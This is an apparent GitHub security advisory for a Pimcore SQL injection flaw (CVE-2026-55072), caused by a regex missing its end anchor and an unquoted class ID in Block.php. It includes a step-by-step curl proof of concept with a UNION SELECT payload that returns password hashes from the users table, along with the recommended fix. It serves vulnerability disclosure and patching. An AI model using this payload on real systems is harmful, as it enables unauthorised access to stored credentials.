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Pimcore: ClassDefinition UID regex missing end anchor allows SQL injection via Block.php unquoted table name

High severity GitHub Reviewed Published Jun 10, 2026 in pimcore/pimcore

Package

composer pimcore/pimcore (Composer)

Affected versions

>= 2026.1.0, <= 2026.1.4
< 12.3.9

Patched versions

2026.1.5
12.3.9

Description

Summary

A missing end anchor ($) in the ClassDefinition UID validation regex allows an authenticated user with the objects permission to create a class with a malicious UID containing SQL. When a data object of that class is later loaded, Block.php concatenates the raw classId directly into a SQL query without quoting, executing the injected payload. This is an incomplete fix from commit dbe1d131e4 which added a leading ^ anchor but omitted the trailing $.

Details

1. Missing end anchor in ClassDefinition UID validation

models/DataObject/ClassDefinition.php lines 1148-1154:

if (!preg_match('/^[a-zA-Z]\w+/', $this->getName())) {
    throw new Exception(sprintf('Invalid name for class definition: %s', $this->getName()));
}

if (!preg_match('/^[a-zA-Z0-9]([a-zA-Z0-9_]+)?/', $this->getId())) {
    throw new Exception(sprintf('Invalid ID `%s` for class definition %s', $this->getId(), $this->getName()));
}

Both patterns are missing a trailing $ anchor. Without it, preg_match only checks that the string STARTS with a valid identifier — it does not assert end-of-string. A UID of 1 UNION SELECT password FROM users-- passes because the regex matches 1 at the start and ignores the rest.

Compare with the correct pattern used by Fieldcollection in models/DataObject/Fieldcollection/Definition.php line 268:

if (!preg_match('/^[a-zA-Z]\w*$/', $key)) {   // has $ — correct
    return true;
}

3. Unquoted classId concatenation in Block.php

models/DataObject/ClassDefinition/Data/Block.php line 735:

$query = 'select ' . $db->quoteIdentifier($field) . ' from object_store_' . $object->getClassId() . ' where oo_id  = ' . $object->getId();

$object->getClassId() returns the raw stored classId with no quoting. This same unquoted pattern repeats on lines 744, 746, 748, 759, and 771 for objectbrick, fieldcollection, and localized field contexts.

Compare with models/DataObject/ClassDefinition/Dao.php line 108-113 which correctly wraps the table name:

$objectDatastoreTable = 'object_store_' . $this->model->getId();
$qObjectDatastoreTable = $this->db->quoteIdentifier($objectDatastoreTable);

Dao.php was hardened in commit dbe1d131e4 but Block.php was not.

PoC

Prerequisites:

  • Pimcore 2026.1.x with Studio API enabled
  • A user lowpriv with only the objects permission

Step 1 — Authenticate as lowpriv and save the session cookie:

curl -s -c /tmp/cookies.txt -X POST \
  "https://your-pimcore/pimcore-studio/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"lowpriv","password":"password"}'

Expected response:

{"message": "Login successful"}

Step 2 — Create a ClassDefinition with a malicious UID:

curl -s -b /tmp/cookies.txt -X POST \
  "https://your-pimcore/pimcore-studio/api/class/definition/configuration-view/detail/create" \
  -H "Content-Type: application/json" \
  -d '{"name":"PocClass","uid":"1 UNION SELECT password,NULL FROM users-- "}'

Expected response: class definition created successfully. The UID passes the broken regex because preg_match('/^[a-zA-Z0-9 ([a-zA-Z0-9_]+)?/', '1 UNION SELECT...') matches 1 at the start and returns true. No exception is thrown.

The bypass can be verified independently in any PHP sandbox:

var_dump(preg_match('/^[a-zA-Z0-9]([a-zA-Z0-9_]+)?/', '1 UNION SELECT password FROM users-- '));
// int(1) — PASSES, no exception thrown

var_dump(preg_match('/^[a-zA-Z0-9]([a-zA-Z0-9_]+)?$/', '1 UNION SELECT password FROM users-- '));
// int(0) — BLOCKED, correct behavior with $ anchor

Step 3 — Add a Block field to the malicious class (via the class editor UI or API)

In the Pimcore Studio UI, open PocClass, add a field of type Block, name it myblock, and save the class.

Step 4 — Create a data object of the malicious class:

curl -s -b /tmp/cookies.txt -X POST \
  "https://your-pimcore/pimcore-studio/api/data-objects" \
  -H "Content-Type: application/json" \
  -d '{"className":"PocClass","parentId":1,"key":"poc-object"}'

Note the returned object ID (e.g. 42).

Step 5 — Fetch the data object to trigger Block.php:735:

curl -s -b /tmp/cookies.txt \
  "https://your-pimcore/pimcore-studio/api/data-objects/42"

When the object loads, Block::load() executes:

SELECT `myblock` FROM object_store_1 UNION SELECT password,NULL FROM users--
WHERE oo_id = 42

The -- comment discards the WHERE clause. MySQL executes the UNION and returns password hashes from the users table in the Block field value of the response.

Expected response (vulnerable):

The myblock field value in the response contains rows from the users table including password hashes.

Expected response (patched):

Step 2 fails with a validation exception — the UID is rejected before the class is created.

Recommended fix:

Add trailing $ anchors to both regex patterns in ClassDefinition.php:

// Before (vulnerable)
if (!preg_match('/^[a-zA-Z]\w+/', $this->getName())) {
if (!preg_match('/^[a-zA-Z0-9]([a-zA-Z0-9_]+)?/', $this->getId())) {

// After (correct)
if (!preg_match('/^[a-zA-Z]\w+$/', $this->getName())) {
if (!preg_match('/^[a-zA-Z0-9]([a-zA-Z0-9_]+)?$/', $this->getId())) {

Additionally, wrap $object->getClassId() in $db->quoteIdentifier() in Block.php lines 735, 744, 746, 748, 759, and 771, consistent with how Dao.php handles the same value.

Impact

An authenticated user with the objects permission can inject arbitrary SQL that executes when any data object of the malicious class is loaded. This allows exfiltration of any table in the Pimcore database, including the users table containing password hashes, using a UNION-based injection. The objects permission is a standard editor-level permission, not an admin privilege.

References

@kingjia90 kingjia90 published to pimcore/pimcore Jun 10, 2026
Published to the GitHub Advisory Database Aug 13, 2026
Reviewed Aug 13, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

EPSS score

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Learn more on MITRE.

CVE ID

CVE-2026-55072

GHSA ID

GHSA-2mhj-fhvg-v428

Source code

Credits

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